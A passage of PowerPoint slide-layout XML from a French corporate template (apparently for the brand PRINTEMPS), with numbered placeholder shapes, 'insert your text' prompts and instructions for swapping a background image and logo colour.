                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5087876" y="5080986"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5040848" y="6038694"/>
                  <a:pt x="4273447" y="6807041"/>
                  <a:pt x="3316135" y="6855567"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3307971" y="6855774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3307971" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2003545" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1738214" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685800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14A0E432-770D-4C4F-BDC4-4EC7EA4C70CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5767321" y="1893465"/>
            <a:ext cx="460768" cy="460768"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21A74297-E316-40A6-81C7-C0C3A30F4554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310222" y="1966883"/>
            <a:ext cx="4720452" cy="313932"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Cliquer ici pour insérer votre texte</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C3B12F-77D4-4E75-9988-E7297706D450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5767321" y="2784716"/>
            <a:ext cx="460768" cy="460768"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F4B68C-26AD-4D9F-8218-2C0170E3E788}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310222" y="2858134"/>
            <a:ext cx="4720452" cy="313932"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Cliquer ici pour insérer votre texte</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6CD0244-15DC-4800-BCD1-192F0B5C6AAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5767321" y="3694036"/>
            <a:ext cx="460768" cy="460768"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A7FAF62-8432-4D4E-B8C4-9A5FC3748840}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310222" y="3767454"/>
            <a:ext cx="4720452" cy="313932"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Cliquer ici pour insérer votre texte</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69AEBBAE-A724-4ECD-915C-DC9EE63902A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5767321" y="4602078"/>
            <a:ext cx="460768" cy="460768"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F27A4A5D-11CE-4F6A-9CC9-D0FDE2915F75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310222" y="4675496"/>
            <a:ext cx="4720452" cy="313932"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Cliquer ici pour insérer votre texte</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0CD6F7E-3D6A-4A3E-84C0-FB45F3708909}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5767321" y="5502281"/>
            <a:ext cx="460768" cy="460768"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A45E4A52-CED8-4E9B-8ACF-70A990275959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310222" y="5575699"/>
            <a:ext cx="4720452" cy="313932"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Cliquer ici pour insérer votre texte</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4399380-5712-4710-B9CA-D2E02DA6844D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4700016" y="6457666"/>
            <a:ext cx="2623233"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53AA926A-0FA2-40F1-8CE7-F1BD8CAD7A17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="29"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78D553F2-0484-4CC7-9746-D401B26DD97C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558732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30" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFC85C69-5DF8-4C39-A132-AF416E98443C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="30" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5587320"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7" name="Groupe 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51DD1ADD-9943-464A-B67B-17F2E513280F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="2451438"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="2451438"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{019596D1-7EED-4E57-B419-8664380D52FC}"/>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3" name="Rectangle 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFBAC260-D784-4001-8C93-2AB8FBD9DB4C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="511520" y="2946559"/>
              <a:ext cx="1885826" cy="2092881"/>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To change the </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="fr-FR" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Gilroy Bold" panose="00000800000000000000" pitchFamily="2" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>visual</a:t>
              </a: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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Supprimer le visuel</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Cliquez sur l'icône au centre du bloc gris</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Importer un visuel depuis votre ordinateur</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Sélectionnez le visuel</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Clic droit &gt; "arrière-plan"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Modifiez la couleur du logo PRINTEMPS (noir/blanc ou vert) en fonction de la luminosité de l'image sélectionnée </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Groupe 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2740B53-BB14-4E60-A30D-E8DB0840DCDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{553D0AE8-AC15-4AB7-96F0-B422D08A0E5A}"/>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5" name="Rectangle 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25455904-2E85-42B4-B123-312C0D4494C7}"/>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46" name="Groupe 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72FA68EA-407F-49DF-A86C-004F37ED412A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="2588002"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="7045594" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="47" name="Groupe 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E11580C-12E9-4804-A190-695D663986DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7045594" y="2588002"/>
              <a:ext cx="1885826" cy="1681996"/>
              <a:chOff x="2689543" y="1651754"/>
              <a:chExt cx="1885826" cy="1681996"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30850EC7-8FBB-459B-AA5C-7547195CF7D6}"/>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51" name="Rectangle 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB82E9C1-B6D3-43C6-A474-A5830EF8F5BA}"/>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48" name="Image 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A909581-444A-45D8-869B-6966B169083F}"/>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9" name="Image 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{095BDA00-8327-4C24-8614-594003693FD6}"/>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2749162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 Big Picture">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27" name="Espace réservé pour une image  26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F89D260-60CB-48B5-98DF-B3C5E97FBC95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2" y="1458413"/>
            <a:ext cx="12191998" cy="4808981"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 12191998"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4808981"/>
              <a:gd name="connsiteX1" fmla="*/ 12191998 w 12191998"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 4808981"/>
              <a:gd name="connsiteX2" fmla="*/ 12191998 w 12191998"/>
              <a:gd name="connsiteY2" fmla="*/ 3050377 h 4808981"/>
              <a:gd name="connsiteX3" fmla="*/ 12156270 w 12191998"/>
              <a:gd name="connsiteY3" fmla="*/ 3404788 h 4808981"/>
              <a:gd name="connsiteX4" fmla="*/ 10433383 w 12191998"/>
              <a:gd name="connsiteY4" fmla="*/ 4808981 h 4808981"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 12191998"/>
              <a:gd name="connsiteY5" fmla="*/ 4808981 h 48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4808981">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12191998" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12191998" y="3050377"/>
                </a:lnTo>
                <a:lnTo>
